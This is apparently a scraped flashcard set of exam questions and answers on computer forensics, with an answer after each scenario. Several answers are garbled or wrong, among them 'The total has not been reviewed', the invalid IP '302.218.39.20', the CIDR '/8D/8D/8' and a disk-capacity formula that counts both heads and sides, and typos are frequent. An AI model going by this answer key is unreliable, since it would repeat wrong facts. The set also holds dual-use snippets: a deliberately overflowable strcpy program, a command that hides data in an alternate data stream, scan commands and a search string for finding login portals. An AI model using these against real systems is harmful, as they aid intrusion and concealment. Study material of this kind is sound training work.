The swapfile

You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended-up in court. What argument could the defense make to weaken your case?

The total has not been reviewed and accepted by your peers

A state department site was recently attacked and all the servers had their disks erased. The incident response team sealed the area and commenced investigation. During evidence collection they came across a zip disks that did not have the standard labeling on it. The incident team ran the disk on an isolated system and found that the system disk was accidentally erased. They decided to call in the FBI for further investigation. meanwhile they short listed possible suspects including three summer interns. Where di the incident team go wrong/.

They tampered with evidence by using it

Jack Smith is a forensics investigator who works for Mason Computer Investigation Services. He is investigating a computer that was infected by Ramen Virus. He runs the netstat command on the machine to see its current connections. In the following screenshot, what do the 0.0.0.0 IP addresses signify?

Those connections are in listening mode

Why should you note all cable connections for a computer you want to seize as evidence?

To know what outside connections existed

When investigating a potential e-mail crime, what is your first step in the investigation?

Trace the IP address to its origin

What layer of the OSI model do TCP and UDP utilize?

Transport

Terry works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls and switches to gain access to the network. Terry sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set. What is Terry trying to accomplish by sending this IP packet?

Trick the switch into thinking it already has a session with Terri's computer

If you discover a criminal act while investigating a corporate policy abuse, it becomes a public-sector investigation and should be referred to law enforcement?

True

Daryl, a computer forensics investigator, has just arrived at the house of an alleged computer hacker. Daryl takes pictures and tags all computer and peripheral equipment found in the house. Daryl packs all the items found in his van and takes them back to his lab for further examination. At his lab, Michael his assistant helps him with the investigation. Since Michael is still in training, Daryl supervises all of his work very carefully. Michael is not quite sure about the procedures to copy all the data off the computer and peripheral devices. How many data acquisition tools should Michael use when creating copies of the evidence for the investigation?

Two

What must an investigator do before disconnecting an IPod from any type of computer?

Unmount the IPod

What is considered a grant of a property right given to an individual who discovers or invents a new machine, process, useful composition of mater or manufacture?

Utility patent

A picture file is recovered from a computer under investigation. During the investigation process, the file is enlarged 500% to get a better view of its contents. The picture quality is not degraded at all from this process. What kind of picture is this file. What kind of picture is this file?

Vector Image

What is the following command trying to accomplish? C:\>nmap -sU -p445 192.168.0.0/24

Verity that UDP port 445 is open for the 192.168.0.0 network

Harold is a computer forensics investigator working for a consulting firm out of Atlanta Georgia. Harold is called upon to help with a corporate espionage case in Miami Florida. Harold assists in the investigation by pulling all the data from the computer allegedly used in the illegal activities. He find that two suspects in the company where stealing sensitive corporate information and selling it to compete companies. From the email and instant Messager logs recovered, Harold has discovered that the two employees notified the buyers by writing symbols on the back of specific stop signs. This way, The buyers knew when and where to meet with the alleged suspects to by the stolen material. What type of steganography did these two suspects use?

Visual semagram

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to argive.org to view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: what have you found?

Web bug

Why should you never power on a computer that you need to acquire digital evidence from?

When the computer boots up, files are written to the computer rendering the data clean

An employee is suspected of stealing proprietary information belonging to your company that he had no right to possess. The information was stored on the employee computer that was protected with the NTFS Encrypted files system (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the employee before he leave the building and recover the floppy disk and secure his computer. Will you be able to break the encryption so that you can verify that the employee was in possession of the proprietary information?

When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information.

In the context of file deletion process, which of the following statement holds true?

While booting, the machine may create temporary files that can delete evidence

Paraben Lockdown device uses which operating system to write hard drive data?

Windows

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

Windows computers are constantly talking

What type of equipment would a forensics investigator store in a StrongHold bag?

Wireless cards

Which is a standard procedure to perform during all computer forensics investigations?

With the hard drive removed from the suspect PC, check the date and time in the system CMOS

When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk?

Write-blocker

During the course of a corporate investigation, you find that an employee is committing a federal crime. Can the employer file a criminal compliant with the police?

Yes, and evidence can be turned over to the police

You are carrying out the last round of testing for your new website before it goes live. The website has many dynamic pages and connects to a SQL backend that accesses your product inventory in a database. You come across a web security site that recommends inputting the following code into a search field on web pages to check for vulnerabilities. When you type this and click on search, you receive a pop-up window that says: "This is a test" What is the result of this test?

Your website is vulnerable to CSS

An "Idle" system is also referred to as what?

Zombie

When examining the log files from a windows IIS web server, How often is a new log file created?

a new log file is created everyday

You are trying to locate Microsoft Outlook Web Access portal using google search on the internet. What search sting will you use to locate them?

allinurl:"exchange/logon.asp"

At what layer does a cross site scripting attack occur on?

application

A(n) ____ is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence.

automated attack

When setting up a wireless network with multiple access points, why is it important to set each access point on a different channel?

avoid cross talk

What will the following command accomplish? dd if=/dev/xxx of=mbr.backup bs=512 count=1

back up the master boot record

You are working as an independent computer forensics investigator and receive a call from a system administrator for a local school system requesting you assistance. One of the students at the local high school is suspected of downloading inappropriate images from the internet to a PC in the Computer Lab. When you arrive at the school, the systems administrator hands you the hard drive and tells you that he made a simple backup copy of the hard drive in the PC and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a simple backup copy will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure the evidence found is complete and admissible in future poceedings?

bit-stream copy

If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.

boot.ini (for Windows OS)

What will the following Linux command accomplish? dd if=/dev/mem of=/home/sam/mem.bin bs=1024

copy of the running memory to a file

What is the name of the standard Linux command that can be used to create bit-stream images?

dd

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore you report this evidence. This type of evidence is known as:

exculpatory evidence

You are conducting an investigation of fraudulent claims in an insurance company that involves complex text searches through large number of documents. Which of the following tools would allow you to quickly and efficiently search for a string within a file on the bitmap image of the target computer?

grep (global regular expression print)

What is the slave device connected to the secondary IDE controller on a Linux OS referred to?

hdd

When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (Mac address) had a specific IP address at a specific time?

in the DHCP Server log files

When a router receives an update for its routing table, what is the metric value change to that path?

increased by 1

What stage of the incident handling process involves reporting events

indentification

Before performing a logical or physical search of a drive in Encase, what must be added to the program?

keywords

To calculate the number of bytes on a disk, the formula is: CHS

number of cylinders X number of heads x number of sides x 512 bytes per sector

Using internet logging software to investigate a case of malicious use of computers, the investigator comes across some entries that appear odd. from the log, the investigator can see where the person in question went on the internet. It appears that the user was manually typing in different US ID numbers. What technique was this user trying?

parameter tampering

Before you are called to testify as an expert, what must an attorney do first?

qualify you as an expert witness

Which of the following should a computer forensics lab used for investigations have?

restricted access

What is the first step taken in an investigation for laboratory forensic staff members?

securing and evaluating the electronic crime scene

What is kept in the following directory? HKLM\SECURITY\Policy\Secrets

service account passwords in plain text

You are assisting a Department of Defense contract company to become compliant with the stringent security policies set by the DOD. One such strict rule is that firewalls must only allow incoming connections that were first initiated by internal computers. What type of firewall must you implement to abide by the policy?

stateful firewall

Paul's company is in the process of undergoing a complete security audit including logical and physical security testing. After all logical tests were performed; it is now time for the physical round to begin. None of the employees are made aware of this round of testing. The security-auditing firm sends in a technician dressed as an electrician. He waits outside in the lobby for some employees to get to work and follows behind them when they access the restricted areas. After entering the main office, he is able to get into the server room telling the IT manager that there is a problem with the outlets in that room. What type of attack has the technician performed?

tailgating

This type of testimony is presented by someone who does the actual fieldwork and does not offer a view in court

technical testimony

Office documents (Word, Excel, PowerPoint) contain a code that allows tracking the MAC, or unique identifier, of the machine that created the document. What is that code called?

the Globally Unique ID

Why is it still possible to recover files that have been emptied from the Recycle Bin on a Windows computer?

the data is still present until the original location of the file is used.

When an investigator contacts by telephone the domain administrator of controller listed by a whois lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?

title 18, section 2703(f)

Why would a company issue a dongle with the software they sell?

to provide copyright protection

You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly stealing clothing designs from the company and selling them under a different brand name for a different company. What you discover during the course of the investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different. what area of the law is the employee violating?

trademark law

When making the preliminary investigations in a sexual harassment case, how many investigators are you recommended having?

two

Where is the default location for Apache access logs on a Linux computer?

usr/local/apache/logs/access_log

The MD5 program is used to:

verify that a disk is not altered when you examine it

Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM files on a computer. Where should Harold navigate on the computer to find the file?

%systemroot%\repair

Area density refers to ?

- The amount of data per disk. -the amount of data per square inch

The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?

-Any data not yet flushed to the system will be lost -All running processes will be lost

Which part of the Windows registry contains the user's password files?

-HKEY_LOCAL_MACHINE -HKEY_CURRENT_USER

You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensic lab due to sensitivity of the case. How would you permanently erase the data on the hard disk?

-Throw the hard disk into the fire -Format the hard disk multiple times using low level disk utility

Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory resident and do not write themselves to the hard drive, if you turn the system off they disappear. In a la environment, which of the following options would you suggest as the most appropriate to overcome the problem of capturing volatile memory?

-Use Vmware to be able to capture the data in memory and examine it. -Create a separate partition of several hundreds megabytes and place the swap file there.

Email logs contain which information to help you in your investigation?

-User account that was used to send the account -unique message identifier -contents of the email message -date and time of the message was sent

Microsoft Outlook maintains email messages in a proprietary format in what type of file

.pst

What is the CIDR from the screen shot?

/8D/8D/8

Where are files temporarily written in Unix when printing?

/var/spool

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

0

You are using DriveSpy, a forensic tool and what to copy 150 sectors where the starting sector is 1790 on the primary drive. Which of the following formats correctly specifies these sectors.

0:1790, 150

To check for POP3 traffic using Ethereal, what port should an investigator search by?

110

How many bits in a Source Port number in TCP Header packet?

16

What is the target host IP in the following command? C:\>firewalk -F 80 10.10.150.1 172.16.28.95 -p UDP

172.16.28.95

Under which federal statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?

18 U.S.C 1030 Fraud and related activity in connection with computers

Which federal computer crime law specifically refers to fraud and related activity in connection with access devices like routers?

18 USC 1029

You should make at least how many bit-stream copies of a suspect drive?

2

Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away. Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler issue with his home wireless network?

2.4Ghz Cordless phones

In Linux, what is the smallest possible shellcode?

24 bytes

In the FAT32 system, a 123KB file will use how many sectors?

246 if you assume that we are using 512 bytes sectors, then 123 x 1024/512=246

You are working in the security Department of a law firm. One of the attorneys ask you about the topic of sending fake email because he has a client who has been charged with doing just that. His client alleges that he is innocent an that there is no way for a fake email to actually be sent. You inform the attorney that his client is mistaken and that fake email is a possibility and that you can prove it. You return to your desk and craft a fake email to the attorney that appears to come from his boss. What port do you send the email to on the company SMTP server?

25

How many sectors will a 125KB file use in a FAT 32 file system?

250 125 x1024/512= 250 sectors This applies to FAT 32 & FAT16 file systems

At what layer of the OSI model do routers function?

3

From the following spam mail heder, identify the host IP that send the spam?

302.218.39.20

If an attacker's computer sends an IPID of 31400 to a zombie (Idle Scanning) computer on an open port, what will be the response?

31401

How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?

32

You are working for a local police department that services a population of 1,000,000 people and you have been give he task to build a computer forensics lab. How many law-enforcement computer investigator should you request to staff the lab?

4

How many possible sequence number combinations are there in TCP/IP protocol?

4 billion

When reviewing web logs, you see an entry for a source not found in the HTTP status code field. What is the actual error code that you would see in the log for a source not found?

404

When reviewing web logs, you see an entry for resource not found in the HTTP status code filed. What is the actual error code that you would see in the log for resources not found?

404

Madison is on trial for allegedly breaking into her university internal network. The police raided her dorm room and seized all of her computer equipment. Madison's lawyer is trying to convince the judge that the seizure was unfounded and baseless. which US amendment is Madison's lawyer trying to prove the police violated?

4th amendment

Sectors in hard disks typically contain how many bytes?

512

Given the drive dimensions as follows and assuming a sector has 512 bytes, what is the capacity of the described hard drive? 22,164 cylinders/disk 80 heads/cylinder 63 sectors/track?

53.26 GB

Jones has been trying to penetrate remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the system for a period of three weeks. However, law enforcement agencies were recorded his every activity and this was later presented as evidence. The organization had used a virtual environment to trap jones. What is a virtual environment?

A honeypot that traps hackers

When investigating a Windows System, it is important to view the contents of the page or swap file because?

A large volume of data can exist within the swap file of which the computer user has no knowledge

If you came across a sheepdip machine at your client site, what would you infer?

A sheepdip counter is used only for virus-checking

Melanie was newly assigned to an investigation and asked to make a copy of all the evidence from the compromised system. Melanie did a DOS copy of all the files on the system. What would be the primary reason for you to recommend a disk imaging tool?

A simple DOS copy will not include deleted files, file slack and other information

Diskcopy is:

A standard MS-DOS command

What feature of Windows is the following command trying to utilize: C:\> type c:\discovery.doc > c:\windows\system32\sol.exe:discovery.doc

ADS

What encryption technology is used on Blackberry devices password keeper?

AES

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being use?

Active IDS

One way to identify the presence of hidden partitions on a suspect hard drive is to:

Add up the total size of all known partitions and compare it to the total size of the hard drive

What does ICMP type3/code 13 mean?

Administratively blocked

Harold is a web designer who has completed a website for ghttech.net. As part of the maintenance agreement he signed with the client, Harold is performing research online and seeing how much exposure the site has received so far. Harold navigates to google.com and types in the following search. link:www.ghttech.net What will this search produce?

All sites that link to ghttech.net

Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold's needs?

Application-level proxy firewall

When needing to search for a website that is no longer present on the Internet today but was online few years back, what site can be used to view the website collection of pages? view the website? Collection of pages?

Archive.org

Jacob is a computer forensics investigator with over 10 years experience in investigations and has written over 50 articles on computer forensics. He has been called upon as a qualified witness to testify the accuracy and integrity of the technical log files gathered in an investigation into computer fraud. What is the term used for Jacob testimony in this case?

Authentication

The newer Macintosh Operating System (MacOS X) is based on:

BSD Unix

Why is it a good idea to perform a penetration test from the inside?

Because 70% of attacks are from inside of the organization

When should an MD5 hash check be performed when processing evidence?

Before and after evidence examination

What method of copying should always be performed first before carrying out an investigation?

Bit-stream copy

All Blackberry email is eventually sent and received through what proprietary RIM-operated mechanism?

Blackberry Message Center

A forensics investigator needs to copy data from a computer to some type of removable media so he can examine the information at another location. The problem is that the data is around 42GB in size. What type of removable media could the investigator use?

Blu-Ray dual-layer

While working for a prosecutor, what do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense?

Bring the information up to the attention of the prosecutor, his or her supervisor or finally the judge.

You are called in to assist the police in an investigation involving a suspected drug dealer. The police searched the suspect house and you are collected in to assist the police in the investigation. The police searched the suspects house after a warrant was obtained and they located a floppy disk in the suspects bedroom. The disk contains several files, but they appear to be password protected. What are two common methods used by password cracking software that you could use to obtain the password?

Brute force and dictionary attacks

Kyle is performing the final testing of an application he developed for the accounting department. His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point? #include #include int main(int argc, char *argv[]) { char buffer[10]; if (argc < 2) { fprintf (stderr, "USAGE: %s string\n", argv[0]); return 1; } strcpy(buffer, argv[1]); return 0; }

Buffer overflow


Conjuntos de estudio relacionados

DNA, RNA, Protein Synthesis #2: DNA Replication

View Set

COM101 - Organizational communication

View Set

Modern Portfolio Theory and Capital Asset Pricing Model

View Set

A&P Lab Exercise 1: Body Planes--be able to identify

View Set

Chapter 12 Power Point & God's Gift

View Set

Facts about Countries and Nationalities

View Set

Med Surg 1 Test 1 Practice Questions

View Set